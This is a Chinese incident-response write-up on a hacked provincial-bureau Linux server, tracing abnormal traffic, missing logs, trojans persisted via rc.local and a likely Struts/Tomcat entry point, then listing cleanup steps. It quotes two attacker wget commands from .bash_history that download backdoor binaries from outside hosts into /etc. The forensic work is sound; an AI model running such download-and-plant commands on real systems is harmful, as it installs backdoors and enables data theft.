记一次某省局被黑应急处理项目过程

[中秋征文] 记一次某省局被黑应急处理项目过程
我是来打酱油的，因为感觉我写的主题不是新技术。。。
1.本次渗透测试分析流程
1.1 流量异常分析
现象：
2014年5月23日下午，某省局流量异常，造成出口带宽阻塞。内部人员无法上外网。
分析：
经过手工排查分析可知：开启外网服务器网卡，流量异常；关闭外网服务器网卡，流量变正常；由此推断是外网应用服务器导致了出口带宽阻塞。
1.2 防火墙端口分析
登录防火墙查看异常流量的流向情况。通过添加源地址为应用服务器地址x.x.x.113为过滤条件，可以看出异常的连接的目的地址为x.x.x.215。

通过百度查询可以知道，远端的目的地址为浙江省温州市。故可断定服务器被攻击了。

1.3 后门webshell检测
根据收集到信息初步判定服务器被挂马了，接下来就是通过手工和工具结合的方式检测网站目录内有无黑客入侵后留下的webshell。
因为服务器是linux，且web应用文件很大，故只能过滤检测。那就查找最近30天更新的jsp文件，并tar包下载到本地，用D盾进行扫描。

但是测试结果没有发现webshell，扫描结果如下图：

1.4 日志分析
被攻击却未检测到webshell，下一步只能从日志入手。日志分析对于整个应急分析来说至关重要，当然有经验的黑客会清理掉入侵日志。
本次应急就出现了这个问题。accesslog文件、auth.log文件均被删除了。

但是黑客百密一疏，只是清理了web日志，未清理系统日志。查看
/root/.bash_history，查看历史命令，发现了蛛丝马迹。

wget -O /etc/liun2.1/liun2.1 http://x.x.x.224:1974/win2
wget -O /etc/liun2.1/liun2.0 http://x.x.x.107:1974/wins1
这两条命令就是远程下载文件到服务器。
打开远端地址可以发现是黑客为抓肉鸡专门搭建的站点。

（PS:报告不涉及社工黑客部分）
1.5 系统级木马分析
截止到现在，终于对于流量异常有了正确的判断，那就是使用了linux系统级后门。
黑客对于后门也进行了版本区别。

查看后门的信息

查看后门的内容（只截取了部分内容）
Strings liu2.0

既然是系统后门，自然是要靠进程运行的。查看进程，一切一目了然。

而且黑客将木马的启动写到了rc.local启动项中。

1.6 隐匿的木马分析
看到上面的分析，发现的木马都是通过http://x.x.x.224:1974/win2
和http://x.x.x.107:1974/wins1来下载运行的。但是这两个远端的ip地址都不是最初在防火墙上发现的x.x.x.215。
登录服务器，查看端口情况，发现了x.x.x..215的链接情况。然后查看pid，找到了木马的运行进程ks。

PS:很明显服务器被两个以上的黑客挂了马。
1.7 漏洞发掘
找到了挂马的情况，接下来就需要进行漏洞挖掘了。通过wvs和nessus机械扫描后，未发现注入、xss等明显漏洞。但是爆出了tomcat版本过低。目前是tomcat6（此版本下存在很多溢出和远程代码执行的漏洞）。查看web目录发现是struts框架。经过测试发现存在struts远程代码执行漏洞。

因为ssh端口不对外开放，而且root密码非常复杂，不存在被爆破的风险。
由此可判定黑客的攻击路线：
通过tomcat的低版本漏洞或者struts漏洞上传webshell，然后远程下载系统后门控制服务器。然后清除webshell以及web日志。
1.8 善后加固工作
1、防火墙上做策略阻断掉上述3个外网ip地址的链接。
2、检测未发现添加新的系统用户。

3、 kill掉所有木马的进程，然后删除建立的目录和木马文件。
3.1 杀死木马进程

3.2 杀死木马之后

4、清除木马

5、升级struts和tomcat的版本为最新。
6、降低web应用的权限，禁止使用root权限。
7、等待应用组升级完struts和tomcat版本，重启服务器。
如果重启服务器，如有可疑进程说明，木马未清理完善，建议重装系统，重新部署应用服务器，根除木马隐患。
1.9 攻击行为分析
综合分析到底为什么会导致流量异常呢？
一般有2种可能性：
1、被当做肉鸡被控制，然后被利用用流量去DDOS别的站点。
2、服务器被控制，正在被下载web文件。
首先我们分析防火墙上那个异常流量的目的地址x.x.x.215。
测试1：端口信息

通过截图，我们基本能判断是个站点。
测试2：站点的框架信息

通过截图，我们可知：搭建的是windows+iis6.0+aspx的站点。
测试3：对站点的漏洞分析
有此来判断站点的利用价值是否值得被DDOS.
1、站点无首页

2、wvs扫描无漏洞，且无任何站点框架目录。

3、御剑未扫描出任何目录。

由以上wvs和御剑的结果可知：
这个站点根本就没有目录和文件，也可推断只是一个用来接收文件的站点。所以远端ip是被DDOS目标的可能性为零。
那就只剩下一种可能，那就是服务器正在被下载web文件，而且外网出口未进行流量超标控制，所以下载的流量占用带宽过大，阻塞了外网的出口，导致内部人员无法上网。
综合第二章对网站的渗透测试分析,此次黑客入侵网站的步骤有可能为:
黑客扫描到tomcat的低版本漏洞或者struts漏洞—>上传webshell控制web权限 —>远程下载系统后门控制服务器—>成功入侵后清除apache日志—>清除webshell—>入侵结束.